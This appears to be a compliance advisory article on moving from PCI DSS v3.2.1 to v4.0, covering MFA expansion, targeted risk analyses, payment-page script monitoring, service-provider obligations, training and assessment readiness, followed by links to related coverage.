PCI DSS Version 4.0 Published

PCI DSS version 4.0, published March 31, 2022, raises the bar for payment security programs by emphasizing outcome-based controls, continuous monitoring, and layered defenses against emerging threats. While organizations may continue validating against v3.2.1 through March 31, 2024, boards, CISOs, and payment operations teams must launch coordinated initiatives to adopt v4.0’s changes—especially the customized approach, expanded multi-factor authentication requirements, targeted risk analyzes, and updated e-commerce protections. The new standard expects governance bodies to show accountability and adaptability as payment channels evolve.

Translate new requirements into actionable workstreams

The standard’s structure remains familiar—12 requirement families with detailed control statements—but many requirements have been clarified or expanded. Requirement 8 now mandates MFA for all access into the cardholder data environment, eliminating the trusted network exemption.

Requirement 6 introduces secure software lifecycle expectations aligned with NIST and OWASP guidance, while Requirement 11 focuses on preventive testing, including detecting unauthorized changes on payment pages. Organizations must inventory which controls are immediately effective and which are future-dated (effective March 31, 2025). Establish cross-functional workstreams covering identity and access management, application security, monitoring, network segmentation, and documentation.

Technology teams should analyze architecture diagrams for CDE scope, including hybrid cloud deployments and microservices. Where tokenization, network segmentation, or virtualization isolates cardholder data, verify that controls still hold under v4.0. Update data flow diagrams and asset inventories to include serverless components, containerized workloads, and API gateways. Ensure network security controls—firewalls, intrusion detection, WAFs—are tuned to defend against account takeover and Magecart-style web skimming consistent with Requirement 11.6.1.

Embed governance and accountability

Requirement 12.1.1 specifies that executive management must establish roles and responsibilities for protecting cardholder data. Governance committees should revise charters to reflect v4.0, assign control owners, and define reporting cadence. Provide the board with a documented transition plan that includes budget allocations, staffing requirements, and dependencies on third parties. Incorporate PCI metrics into enterprise risk dashboards and ensure risk appetite statements address payment data breaches, downtime, and regulatory penalties.

Internal policies must be updated. Align information security policy suites, access management standards, and secure development policies with v4.0 terminology and control expectations. Update change management procedures to include verification of new controls—such as reviewing script approvals, documenting risk analyzes, and validating MFA coverage. Ensure policy updates are communicated to employees via training, attestation workflows, and awareness campaigns.

The customized approach helps entities to design alternative controls if they can show that outcomes meet PCI’s objective. set up a governance process for evaluating proposals: require business justification, risk assessment, testing plans, and approval by senior security leaders and QSAs. Maintain repositories for customized control documentation and ensure change management applies when control designs evolve.

Operationalizing targeted risk analyzes and continuous monitoring

Several requirements now require targeted risk analyzes (TRAs), allowing organizations to set control frequencies commensurate with risk. Develop a TRA methodology aligned with ISO 31000 or NIST SP 800-30, incorporating threat intelligence, vulnerability data, business impact, and compensating controls. Train risk analysts and control owners on performing TRAs, documenting assumptions, and obtaining management sign-off. Integrate TRA outputs into GRC platforms so evidence is readily available for QSAs.

Continuous compliance demands richer telemetry. Build centralized logging architectures that aggregate data from on-premises and cloud systems, ensuring log integrity and retention meet Requirement 10. Implement security orchestration, automation, and response (SOAR) playbooks for common alerts, and document tuning decisions as part of compliance evidence. Expand vulnerability management to cover container images, infrastructure-as-code templates, and third-party components. Ensure penetration testing scopes include APIs, mobile applications, and cloud services, and coordinate with DevSecOps teams to remediate findings quickly.

Customer-facing payment pages require tamper detection. Deploy solutions such as content security policies, subresource integrity, and JavaScript monitoring to detect unauthorized changes. Establish approval workflows for third-party scripts, capture evidence of reviews, and validate controls in QA environments before production release. Combine monitoring with incident response drills covering web skimming scenarios.

Implications for service providers and outsourcing

Service providers face heightened expectations under v4.0, including semi-annual segmentation testing and detailed reporting to clients. Managed service providers, payment gateways, and cloud hosts should update responsibility matrices that outline which controls they manage and how customers can validate them. Provide customers with transparent documentation—SOC 2 reports, penetration test summaries, configuration baselines—and update attestation packages to reference new requirements.

Merchants must revisit contracts and service-level agreements to incorporate v4.0 obligations. Require suppliers to notify of control failures, maintain up-to-date penetration testing, and participate in coordinated incident response exercises. Implement supplier scorecards tracking v4.0 readiness, including MFA coverage, logging practices, and segmentation controls. Where suppliers support the customized approach, ensure they provide sufficient evidence for QSAs to validate outcomes.

For organizations consuming software-as-a-service or platform services, verify how cardholder data is processed, stored, or transmitted. Demand architecture diagrams and data flow descriptions that clarify scope. Evaluate whether tokenization or point-to-point encryption (P2PE) solutions need upgrades to align with v4.0. Maintain contingency plans if suppliers cannot meet timelines, including alternative providers or internalization strategies.

Training, culture, and change management

PCI DSS 4.0 expands requirement 12.6 on security awareness training to address evolving threats such as phishing. Update curricula to include social engineering tactics targeting payment staff, secure coding practices for React/Angular single-page applications, and procedures for managing customized controls. Track training completion and effectiveness through assessments and simulated phishing campaigns.

Communicate changes to frontline employees—call center staff, retail associates, developers—so they understand new MFA processes, access restrictions, and escalation paths. Provide job aids for handling cardholder data in remote or hybrid work scenarios, including secure workspace guidelines, device hardening, and incident reporting. Engage HR and communications teams to reinforce accountability and celebrate milestones achieved in the transition.

Assessment readiness and documentation

Prepare for assessments by organizing evidence around the new requirement structure. Update control narratives, diagrams, and inventories within GRC systems. Conduct internal assessments mirroring QSA procedures, including sampling, interviews, and control testing. Document compensating controls where full compliance is not yet achievable, ensuring they meet PCI’s criteria (identifying constraints, demonstrating equal or greater protection, and documenting validation).

Plan for future-dated requirements by setting interim checkpoints. For example, schedule completion of MFA expansion and script monitoring well before the March 31, 2025 deadline, leaving time for remediation and reassessment. Maintain issue logs that track owner, severity, action plan, and due dates. Report progress to executive leadership monthly, highlighting dependencies on budget, staffing, or vendor deliverables.

By embedding PCI DSS 4.0 into enterprise risk management, aligning governance structures, and cultivating trusted supplier relationships, organizations can transition smoothly from v3.2.1 while elevating their overall security posture. Early investment in targeted risk analysis, customized control design, and continuous monitoring will reduce last-minute compliance scrambling and strengthen protection of payment data.

Similar analysis

Additional analysis covering similar themes.

Compliance · Credibility 91/100 · March 31, 2022

PCI DSS version 4.0 released

The PCI Security Standards Council published PCI DSS v4.0 on 31 March 2022, expanding requirements for authentication, e-commerce, and risk-based testing with transition timelines into 2025.

Compliance · Credibility 94/100 · January 28, 2026

PCI DSS 4.0.1 Clarifications Address Targeted Risk Analysis and Client-Side Script Controls

The PCI Security Standards Council has published PCI DSS version 4.0.1, a limited revision that clarifies several requirements that generated widespread confusion during the first year of PCI DSS 4.0 enforcement. Key…

Compliance · Credibility 94/100 · September 28, 2021

PCI DSS v4.0

PCI Security Standards Council releases PCI DSS version 4.0 draft for public review, introducing flexible authentication approaches, expanded validation methods, and modernized security requirements for evolving payment…

Compliance · Credibility 91/100 · March 18, 2020

PCI SSC permits remote assessments during COVID-19 disruptions

PCI SSC released guidance for remote assessments in March 2020—a pandemic necessity. QSAs could do evidence collection remotely with proper controls. This changed how compliance audits work.

Compliance · Credibility 87/100 · March 31, 2025

PCI DSS 4.0

PCI DSS 4.0's grace period is over. March 31, 2025 ends the three-year transition from v3.2.1—no more exceptions. If you handle cardholder data, you need MFA everywhere (not just remote access), automated log review, and…

Continue in the Compliance pillar

Return to the hub for curated research and deep-dive guides.

Visit pillar hub

Latest guides

• Third-Party Risk Oversight Playbook

  Operationalize OCC, Federal Reserve, EBA, and MAS outsourcing expectations with lifecycle controls, continuous monitoring, and board reporting.

• Compliance Operations Control Room

  Implement cross-border compliance operations that satisfy Sarbanes-Oxley, DOJ guidance, EU DORA, and MAS TRM requirements with verifiable evidence flows.

• ESG Assurance Operating Guide

  Deploy credible ESG assurance across CSRD, SEC climate disclosure, and ISSA 5000 requirements with regulator-aligned controls, data governance, and audit-ready evidence.

Coverage intelligence

Published

March 31, 2022

Coverage pillar

Compliance

Source credibility

92/100 — high confidence

Topics

PCI DSS · Payment security · Continuous compliance · Multi-factor authentication

Sources cited

3 sources (pcisecuritystandards.org, blog.pcisecuritystandards.org, iso.org)

Reading time

6 min

Further reading

1. PCI SSC — PCI Data Security Standard v4.0 — pcisecuritystandards.org
2. PCI Perspectives Blog — PCI DSS v4.0: Understanding the Changes — pcisecuritystandards.org
3. ISO 37301:2021 — Compliance Management Systems — International Organization for Standardization